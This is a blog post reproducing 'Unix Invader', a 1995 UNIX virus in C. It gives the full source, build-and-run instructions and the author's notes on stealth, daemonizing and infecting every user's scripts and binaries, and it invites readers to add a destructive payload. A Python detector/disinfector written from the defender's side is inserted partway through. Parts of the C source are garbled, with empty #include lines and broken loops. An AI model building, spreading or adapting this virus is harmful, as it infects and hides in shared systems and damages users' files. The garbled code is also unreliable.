
Friday, 11 November 2011

A UNIX virus written in C

This is a computer virus for UNIX.
Virus name: Unix Invader
Written by NCKU htk

Its characteristics are:
1. It has the properties of a daemon process (it loses its controlling tty), so even when the process owner is not logged in, the virus keeps running and is not terminated by the system.
2. It can infect script files and every kind of binary file on UNIX (given suitable permissions), and does not re-infect. After infection, the executable or script file still runs... (stating the obvious).
3. Its method of hiding in memory: it scans the passwd file and uses the basename of the user's login shell as its program name, so with ps -aux (plain ps does not show it) or programs like top you have to look carefully to spot it... (a bit sneaky).
4. It does not keep more than one resident copy; at most one per user, the aim being to broaden its infection reach.
5. Others... none.
6. I originally wanted to add the ability to survive even root's kill -9, but time was limited and it was not worth the effort, so I dropped it... (don't tell me kill -9 pid is invincible, I still have a way).
How to experiment?
cp a few binary files into your home directory, and create a few script files whose first character is #....
How to start?
1. Save this file as filename.c
2. gcc -O -o virus@ filename.c or cc -O -o virus@ filename.c
   (the @ in the name is very important, it must be there!)
3. There may be some warnings; ignore them.... Then a file named virus@ should appear.
4. Run ls -l to see how long the virus@ file is, and note the length.
5. Use vi or any editor to go back into filename.c and change the file length after the #define (where it is marked "here").
6. Then repeat step 2; the virus@ you get now is the one we want.
7. Run it... ok! :)

8. You are now infected (within ten seconds)........ from now on, as soon as a suitable file exists it will be infected immediately...
Other notes:
1. I did not write a payload for this virus, because anyone can do damage and I did not want to waste effort devising a cruel destructive action........ Those interested can add one themselves....
2. This virus runs under the UNIX operating system, which proves one thing.... as long as there are humans, there is no environment in which a virus is impossible; methods are devised by people.
3. Looking at this virus from a system administrator's point of view, one conclusion can also be drawn: an account that can be infected by this virus also has a very high chance of being cracked.
4. This virus currently starts its infection search from the home directories of all users who are logged in; in fact, if a user's directory contains a symbolic link to the root directory, the search may sweep the entire directory tree of the workstation.
5. This virus does not scan directories constantly; by default it wakes up once every 10 seconds, so as not to be noticed... :)
6. This virus shows no mercy, so your own directory will be infected too, and setting permissions on your own files will not help, so move your files out of the way before experimenting!
7. Experimenting with this virus on a shared workstation is quite unethical; the author experimented on his own Linux machine. You... look out for yourself; if you get caught or your account is removed, don't blame the author htk for not warning you. OK?
Have fun, everyone!

Note: Dark Slayer is the current head of the Taiwan Power Virus Organization...
1995/6/15>
*/
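As an added defender-side example (not part of the original post or htk's code), the following Python turns the infection layout described above into a detector and disinfector: a script is flagged by the loader line the virus appends before its own body, and a binary by the virus head written over the host's first VL bytes. VL, the signature length, the virus body and the sample files are constructed stand-ins; the real constants were VL = 18606 and CHK = 512.

```python
import re

# Constructed stand-ins: the real virus used VL = 18606 and compared CHK = 512 head bytes.
VL = 64                                  # length of the virus body in bytes
SIGNATURE_LEN = 16                       # head bytes used as the detection signature
VIRUS_BODY = b"\x7fELF" + bytes(range(VL - 4))   # harmless byte pattern standing in for the body
SIGNATURE = VIRUS_BODY[:SIGNATURE_LEN]

# Loader line appended to scripts, rebuilt from the page's LOADER and LOADER2 macros.
LOADER_RE = re.compile(
    rb"\nrm -f /tmp/\.@`whoami`;cat < (?P<host>[^|\n]*) \|tail -c (?P<vl>\d+) >/tmp/\.@`whoami`;"
    rb"chmod 700 /tmp/\.@`whoami`;/tmp/\.@`whoami`;rm -f /tmp/\.@`whoami`;exit;\n$"
)

def classify(data: bytes, vl: int = VL, sig: bytes = SIGNATURE) -> str:
    """Return 'binary', 'script' or 'clean', applying the virus's own layout rules."""
    if data.startswith(sig):
        return "binary"          # body written over the host's first VL bytes
    if data[:1] == b"#" and len(data) > vl and LOADER_RE.search(data[:-vl]):
        return "script"          # loader line plus VL body bytes appended
    return "clean"

def restore_host(data: bytes, vl: int = VL, sig: bytes = SIGNATURE) -> bytes:
    """Undo the infection, mirroring the unpacking the virus does before exec-ing its host."""
    kind = classify(data, vl, sig)
    if kind == "script":
        return data[: LOADER_RE.search(data[:-vl]).start()]
    if kind == "binary" and len(data) > 2 * vl:
        return data[-vl:] + data[vl:-vl]   # layout [body][host[vl:]][host[:vl]]
    if kind == "binary":
        return data[vl:]                   # layout [body][host], host was <= vl bytes
    return data

# Constructed samples laid out exactly as the page describes an infection.
HOST_SCRIPT = b"#!/bin/sh\necho hello\n"
LOADER_LINE = (b"\nrm -f /tmp/.@`whoami`;cat < ./hello.sh |tail -c 64 >/tmp/.@`whoami`;"
               b"chmod 700 /tmp/.@`whoami`;/tmp/.@`whoami`;rm -f /tmp/.@`whoami`;exit;\n")
INFECTED_SCRIPT = HOST_SCRIPT + LOADER_LINE + VIRUS_BODY
SMALL_BIN = b"\x7fELF" + b"s" * 20                  # 24-byte host, smaller than VL
INFECTED_SMALL = VIRUS_BODY + SMALL_BIN
BIG_BIN = bytes(range(256)) * 2                      # 512-byte host, larger than VL
INFECTED_BIG = VIRUS_BODY + BIG_BIN[VL:] + BIG_BIN[:VL]

if __name__ == "__main__":
    for label, blob in [("script", INFECTED_SCRIPT), ("small", INFECTED_SMALL), ("big", INFECTED_BIG)]:
        print(label, classify(blob), len(restore_host(blob)))
```

Against a real sample, replace SIGNATURE with the first CHK bytes of a captured copy and VL with the length noted in step 4 above; the trailing extra copy of the host head that the virus leaves on large binaries is discarded by restore_host.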

/* A VIRUS IN UNIX !!!! */
/* written by NCKU EE htk */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define CHK 512
#define PERM S_IRWXU
#define CHKT 10
#define LOADER "\nrm -f /tmp/.@`whoami`;cat < "
#define LOADER2 " |tail -c 18606 >/tmp/.@`whoami`;chmod 700 /tmp/.@`whoami`;/tmp/.@`whoami`;rm -f /tmp/.@`whoami`;exit;\n"
/* ^^^^^modify here !!! */
#define VL 18606
/* and ^^^^^ here !!! */
#define VLL -VL

#define BUFSIZE 25088
#define BSI 80
#define EXE 1
#define SCR 2
struct flock bk;
int fo,f,status=NULL;
int flagn=0;
void main(argc,argv,envp)
int argc;
char *argv[];
char *envp[];
{
    char *buf2,*fname;
    static char pidp[BSI]="/tmp/.";
    static char bufr[BSI]="";
    static int dec;
    unsigned int k,kep;
    struct passwd *getp;
    int caller(void);
    int chec(int);
    char *base(char *);
    char *find(void);
    void catch(void);
    int check(char *,int);
    signal(SIGCLD,SIG_IGN);

    strcat(pidp,ecvt((double)getuid(),chec(getuid()),&dec,&dec));

    fname=(char *)tempnam("/tmp",NULL);
    buf2=(char *)malloc(BUFSIZE);
    if((fo=open(argv[0],O_RDONLY))<0 || (f=creat(fname,PERM))<0) exit(1);
    if((kep=lseek(fo,0L,2))>2*VL)
    {
        lseek(fo,VLL,2);
        k=read(fo,buf2,VL);
        write(f,buf2,k);
        lseek(fo,VL,0);
        while((k=read(fo,buf2,BUFSIZE))>0)
            write(f,buf2,k);
        /* ignore more lefting virus in a tail */
    }
    else
    {
        lseek(fo,VL-kep,2);
        k=read(fo,buf2,kep-VL);
        write(f,buf2,k);
    }
    close(f);
    chmod(fname,S_IRWXU);
    free(buf2);

    if((kep=fork())>0)
    {
        for(k=0;k if(*(argv[0]+k)=='@') exit(0);
        execve(fname,argv,envp);
    }
    else
    if(kep==0)
    {
        sleep(2);
        unlink(fname);

        for(k=0;k getp=(struct passwd *)getpwuid(getuid());
        strcpy(argv[0],base(getp->pw_shell));

        /* initialize daemon process ... */

        for(k=0;k<2;k++) close(k);
        umask(0);
        if(fork()!=0)exit(0);
        signal(SIGHUP,SIG_IGN);
        signal(SIGINT,SIG_IGN);
        signal(SIGTTOU,SIG_IGN);
        setpgrp();
        if((kep=open("/dev/tty",O_RDWR))>=0)
        {
            ioctl(kep,TIOCNOTTY,(char *)0);
            close(kep);
        }
        if(fork()!=0)exit(0);

        signal(SIGUSR1,catch);
        if((kep=open(pidp,O_CREAT|O_RDWR,S_IRUSR|S_IWUSR))<0) exit(1);
        k=read(kep,bufr,BSI);
        if(k!=0) kill(atoi(bufr),SIGUSR1);
        strcpy(bufr,ecvt((double)getpid(),chec(getpid()),&dec,&dec));
        lseek(kep,0L,0);
        do{
            k=write(kep,bufr,strlen(pidp)+1);
            while((buf2=find())!=NULL)
            {
                getp=(struct passwd *)getpwnam(buf2);
                if(chdir((buf2=(char *)getp->pw_dir))<0) continue;
                if(ftw(buf2,caller,15)!=0) continue;
            }
            sleep(CHKT);
            setutent();
            lseek(kep,0L,0);
        }while(1);
    }
}
int chec(num)
int num;
{
    int y=1;
    while((num=(int)(num/10))>=1) y++;
    return(y);
}
void catch(void)
{
    flagn=1;
}

char *base(poi)
char *poi;
{
    int i;
    for(i=(strlen(poi)-1);i>=0;i--)
        if(*(poi+i)=='/') return((char *)(poi+i+1));
    return("sh");
}
char *find()
{
    static char name[9]="";
    struct utmp *goal;
    goal=(struct utmp *)getutent();
    if(goal->ut_type==USER_PROCESS)
    {
        strcpy(name,goal->ut_user);
        return(name);
    }
    if(goal==(struct utmp *)NULL) return(NULL);
}

int caller(name,statptr,type)
char *name;
struct stat *statptr;
int type;
{
    unsigned int nread,ymode;
    static char load[200];
    char buf[VL],buf3[VL];
    if(type==FTW_F)
    {
        ymode=statptr->st_mode;
        if(check(name,ymode)<0)
        {
            if(statptr->st_uid==getuid()) chmod(name,ymode);
            return(0);
        }
        if( status==SCR )
        {
            strcpy(load,LOADER);
            strcat(load,name);
            strcat(load,LOADER2);
            lseek(f,0L,2);
            write(f,load,strlen(load));
            lseek(fo,0L,0);
            nread=read(fo,buf,VL);
            write(f,buf,nread);
        }
        if( status==EXE )
        {
            if(statptr->st_size>VL)
            {
                lseek(f,0L,0);
                nread=read(f,buf,VL);
                lseek(f,0L,2);
                write(f,buf,nread);
                lseek(fo,0L,0);
                nread=read(fo,buf,VL);
                lseek(f,0L,0);
                write(f,buf,nread);
            }
            else
            {
                lseek(f,0L,0);
                nread=read(f,buf3,VL);
                ymode=nread;
                lseek(fo,0L,0);
                nread=read(fo,buf,VL);
                lseek(f,0L,0);
                write(f,buf,nread);
                write(f,buf3,ymode);
            }
        }
        /* lseek(f,0L,0);
           lockf(f,F_ULOCK,0); */
        /* author's linux library has no above program library */

        bk.l_type=F_UNLCK;
        bk.l_whence=0;
        bk.l_len=0;
        bk.l_start=0;
        fcntl(f,F_SETLK,&bk);

        if(statptr->st_uid==getuid()) chmod(name,ymode);
        close(f);
    }
    if(flagn) exit(0);
    return(0);
}
int check(name,ymode)
char *name;
int ymode;
{
    char ch[CHK];
    char ch2[CHK];
    int rd,i;
    status=(int)NULL;
    if((f=open(name,O_RDWR))<0)
    {
        if(chmod(name,ymode|S_IRUSR|S_IWUSR)<0) return(-1);
        if((f=open(name,O_RDWR))<0) return(-1);
    }
    /* if(lockf(f,F_TLOCK,0)<0) { close(f); return(-1); } */
    bk.l_type=F_WRLCK;
    bk.l_whence=0;
    bk.l_len=0;
    bk.l_start=0;
    if(fcntl(f,F_SETLK,&bk)<0) { close(f); return(-1); }
    lseek(f,0L,0);
    rd=read(f,ch,CHK);
    lseek(fo,0L,0);
    read(fo,ch2,rd);
    for(i=0;i if(ch[i]!=ch2[i])
    {
        if( ch[0]!='#' && (ymode&(S_IXUSR|S_IXGRP|S_IXOTH)) )
        { status=EXE; return(1); }
        else
        if( ch[0]=='#' && lseek(f,0L,2)>VL ) /* you can improve the rule */
        {
            lseek(f,VLL,2);
            rd=read(f,ch,CHK);
            lseek(fo,0L,0);
            read(fo,ch2,rd);
            for(i=0;i if(ch[i]!=ch2[i])
            { status=SCR; return(1); }
        }
        else if(ch[0]=='#')
        { status=SCR; return(1); }
        break;
    }
    close(f);
    return(-1);
}
